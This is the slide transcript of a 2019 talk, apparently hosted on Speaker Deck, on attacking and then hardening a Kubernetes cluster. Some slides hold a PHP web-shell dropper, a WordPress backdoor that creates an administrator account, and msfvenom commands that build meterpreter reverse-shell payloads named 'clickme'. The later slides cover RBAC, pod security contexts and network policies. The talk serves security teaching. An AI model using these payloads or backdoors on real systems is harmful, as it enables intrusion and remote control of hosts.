Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Attacking a K8s cluster and how defending it

Johann du Toit
October 31, 2019
Technology
0
58

Attacking a K8s cluster and how defending it

Will show how to attack a Kubernetes cluster followed promptly by how to secure your cluster.

Johann du Toit

October 31, 2019
Tweet

More Decks by Johann du Toit

See All by Johann du Toit
RESPECTING THE MICROSERVICE.
johanndutoit
1
56
Why so serious? Using GCP for realtime video context analyzation
johanndutoit
0
74
Progressive Web Apps in 15 Minutes
johanndutoit
0
37
The Machine Learning Intervention
johanndutoit
0
63
Progressive Web Apps
johanndutoit
0
92
Progressive Web Apps
johanndutoit
0
95
Launchpad Start Day 2 - Google Design Sprints
johanndutoit
2
120
Google Design Sprints
johanndutoit
0
81
Cloud Messaging
johanndutoit
0
170

Other Decks in Technology

See All in Technology
10分で紹介するAmazon Bedrock利用時のセキュリティ対策 / 10-minutes introduction to security measures when using Amazon Bedrock
hideakiaoyagi
0
180
あれは良かった、あれは苦労したB2B2C型SaaSの新規開発におけるCloud Spanner
hirohito1108
2
370
モノレポ開発のエラー、誰が見る?Datadog で実現する適切なトリアージとエスカレーション
biwashi
6
790
目の前の仕事と向き合うことで成長できる - 仕事とスキルを広げる / Every little bit counts
soudai
24
6.6k
利用終了したドメイン名の最強終活〜観測環境を育てて、分析・供養している件〜 / The Ultimate End-of-Life Preparation for Discontinued Domain Names
nttcom
1
120
Googleマップ/Earthが一般化した
地図タイルのイマ
mapconcierge4agu
1
200
インフラをつくるとはどういうことなのか、 あるいはPlatform Engineeringについて
nwiizo
5
2.4k
運用しているアプリケーションのDBのリプレイスをやってみた
miura55
1
490
OpenID Connect for Identity Assurance の概要と翻訳版のご紹介 / 20250219-BizDay17-OIDC4IDA-Intro
oidfj
0
160
RSNA2024振り返り
nanachi
0
530
バックエンドエンジニアのためのフロントエンド入門 #devsumiC
panda_program
16
7k
TAMとre:Capセキュリティ編 〜拡張脅威検出デモを添えて〜
fujiihda
1
180

Featured

See All Featured
The Language of Interfaces
destraynor
156
24k
Testing 201, or: Great Expectations
jmmastey
42
7.2k
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
356
29k
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
44
7k
How To Stay Up To Date on Web Technology
chriscoyier
790
250k
Git: the NoSQL Database
bkeepers
PRO
427
64k
RailsConf 2023
tenderlove
29
1k
Let's Do A Bunch of Simple Stuff to Make Websites Faster
chriscoyier
507
140k
GraphQLの誤解/rethinking-graphql
sonatard
68
10k
The Art of Delivering Value - GDevCon NA Keynote
reverentgeek
10
1.3k
Unsuck your backbone
ammeep
669
57k
Statistics for Hackers
jakevdp
797
220k

Transcript

  1. Bust a Kube: Let’s attack a Kubernetes cluster and secure

    it along the way
  2. None
  3. None
  4. None
  5. None
  6. None
  7. None

  8. WHAT ATTACKING DEFENDING

  9. None

  10. WHAT ATTACKING OMG HELP

  11. None
  12. None
  13. None

  14. PODS NODES SERVICES NAMESPACES

  15. POD Pods are the smallest unit of work in kubernetes

    All containers in a pod share IP 10.10.10.1 10.10.10.2 10.10.10.3 10.10.10.4 ip address pod container volume

  16. Node Kubelet Container Runtime: Docker Kube-proxy Kubelet C ontainer Runtim

    e pod #1 pod #2 pod #3

  17. Services A service is a load balancer, create a DNS

    name and ip address that routes traffic to matching labels 10.100.10.1 10.10.10.2 10.10.10.2 service ip address public traffic

  18. Services A service is a load balancer, create a DNS

    name and ip address that routes traffic to matching labels 10.100.10.1 10.10.10.2 10.10.10.2 service ip address public traffic app=hello tier=web app=hello tier=web

  19. Namespaces Logical grouping of resources and the first hint of

    multi-tenancy 10.10.10.2 10.10.10.2 10.10.10.2 10.10.10.2 Marketing Finance
  20. None

  21. > kubectl apply -f app.yaml

  22. None

  23. KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD

  24. POD Pods are the smallest unit of work in kubernetes

    All containers in a pod share IP 10.10.10.1 10.10.10.2 10.10.10.3 10.10.10.4 ip address pod container volume Attacks Tend to Start from a POD
  25. None
  26. None

  27. <?php add_action('wp_head', 'WordPress_bscript'); function WordPress_bscript() { file_put_contents( "exec.php", ‘<?php echo

    shell_exec($_REQUEST[“c”]);’ ); } ?>
  28. None
  29. None

  30. <?php add_action('wp_head', 'WordPress_backdoor'); function WordPress_backdoor() { If ($_GET['backdoor'] == 'go')

    { require('wp-includes/registration.php'); If (!username_exists('backdooradmin')) { $user_id = wp_create_user('admin', ‘admin'); $user = new WP_User($user_id); $user->set_role('administrator'); } } } ?>

  31. “Head over to your site and try the function. It’s

    fun, completely safe and can help you in the future if you ever need to have a backdoor entry to your website.”
  32. None
  33. None
  34. None
  35. None
  36. None
  37. None
  38. None

  39. Kali Linux

  40. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f sh \ -o clickme.sh

  41. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f elf \ -o clickme

  42. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f exe \ -o clickme.exe

  43. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f macho \ -o clickme.macho
  44. None
  45. None
  46. None
  47. None

  48. KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD

  49. CONTROL PLANE NETWORKING HOST RUNTIME

  50. CONTROL PLANE NETWORKING HOST RUNTIME

  51. KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD

  52. None
  53. None
  54. None
  55. None
  56. None
  57. None

  58. UPGRADE!

  59. None

  60. Role Based Access Control

  61. “RBAC”

  62. None

  63. Role: MarketingAdmin Role: Developer

  64. apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: namespace: marketing name: secret-reader rules:

    - apiGroups: [""] resources: ["secrets"] verbs: ["get", "watch", "list"] Role: MarketingAdmin Role: Developer

  65. apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: namespace: marketing name: secret-reader rules:

    - apiGroups: [""] resources: ["secrets"] verbs: ["get", "watch", "list"] Role: MarketingAdmin Role: Developer RoleBinding

  66. CONTROL PLANE NETWORKING HOST RUNTIME

  67. apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:

    1000 Step 1: Run as Non Root

  68. apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:

    1000 readOnlyRootFileSystem: true Step 2: Read Only Filesystem

  69. apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:

    1000 readOnlyRootFileSystem: true allowPrivilegeEscalation: false Step 3: Prevent Escaping

  70. CONTROL PLANE NETWORKING HOST RUNTIME

  71. apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: allow-db-access spec: podSelector: matchLabels:

    tier: database ingress: - from: - podSelector: matchLabels: frontend policyTypes: - Ingress Network Policy
  72. None
  73. None
  74. None

  75. CONTROL PLANE NETWORKING HOST RUNTIME

  76. None
  77. None

  78. Minimal Host OS

  79. None

  80. AppArmor

  81. seccomp

  82. Questions?

  83. • CIS Benchmark - CIS Security • Kube-bench - Aqua

    Security • Kube Auto Analyzer - Rory McCune • KubeAudit - Shopify • Sonobuoy - VMWare / Heptio • KubeATF - Symantec

  84. Security is a not a noun you refer to every

    now and then, it’s a verb and involves constant and specific action

  85. Thanks! [email protected] @signedness